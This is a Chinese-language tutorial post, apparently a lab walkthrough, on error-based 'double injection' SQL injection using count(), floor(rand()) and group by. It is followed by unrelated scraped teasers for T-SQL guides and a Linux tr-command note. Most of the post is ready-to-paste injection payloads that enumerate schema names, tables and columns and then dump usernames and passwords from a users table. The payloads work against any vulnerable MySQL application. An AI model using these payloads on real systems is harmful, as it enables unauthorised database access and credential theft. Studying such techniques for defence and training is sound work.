雙注入查詢需要理解四個函式/語句
rand() 隨機函式
floor() 取整函式
count() 彙總,聚合函式
group by clause 分組語句
簡單地說也就是在乙個聚合函式裡,如果count函式後面有分組語句,就會把查詢的一部分以報錯的形式顯示出來。
' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 4,1),"給我隔開",floor(rand()*2)) as a from information_schema.tables group by a)x) --+
' and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),"給我隔開",floor(rand()*2)) as a from information_schema.tables group by a)x) --+
爆列,這裡恰好limit 1,1就是username列
' and (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name='users' limit%201,1),"給我隔開",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+
使用者名列出來了,下乙個應該就是密碼列了
' and (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name='users' limit 2,1),"給我隔開",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+
完美,接下來就直接出使用者名稱及其密碼
' and (select 1 from(select count(*),concat((select concat('我是賬號',username,char(32,58,32),'我是密碼',password) from security.users limit 1,1),"給我隔開",floor(rand(-1)*2)) as a from information_schema.tables group by a)x) --+
T SQL 入門攻略
更改資料庫名 1 alter database database name modify name new database name 2 sp renamedb olddbname,newdbname 新增資料檔案和檔案組 擴大 1 新增資料檔案 use master godeclare data...
T SQL入門攻略
t sql入門攻略之1 初識t sql t sql入門攻略之2 sql資料型別 t sql入門攻略之3 sql簡單查詢 t sql入門攻略之4 萬用字元使用 t sql入門攻略之5 t sql的變數與常量 t sql入門攻略之6 t sql運算子與流程控制 t sql入門攻略之7 常見系統函式 t ...
Linux shell 指令碼攻略學習筆記5
這次該說tr命令了 1 基本用法 tr 只能通過stdin 標準輸入 而無法通過命令列引數來接受輸入。它的呼叫格式如下 tr options set1 set2將來自stdin 的輸入字元從set1 對映 set2,然後將輸出寫入stdout 標準輸出 set1 和set2 是字元類或字符集。如果兩...